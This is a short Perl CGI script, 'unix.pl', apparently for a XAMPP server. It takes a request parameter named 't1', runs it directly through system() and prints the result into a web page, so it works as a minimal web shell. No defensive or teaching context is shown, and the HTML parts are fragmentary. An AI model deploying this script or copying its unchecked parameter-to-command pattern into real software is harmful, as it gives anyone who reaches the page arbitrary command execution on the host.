unix.pl #!"D:/xampp/perl/bin/perl" print "Content-type: text/html \n\n", ""; "command

\n"; use CGI ':standard'; my $cmd= param('t1'); $re=system($cmd); print "

result


$re

"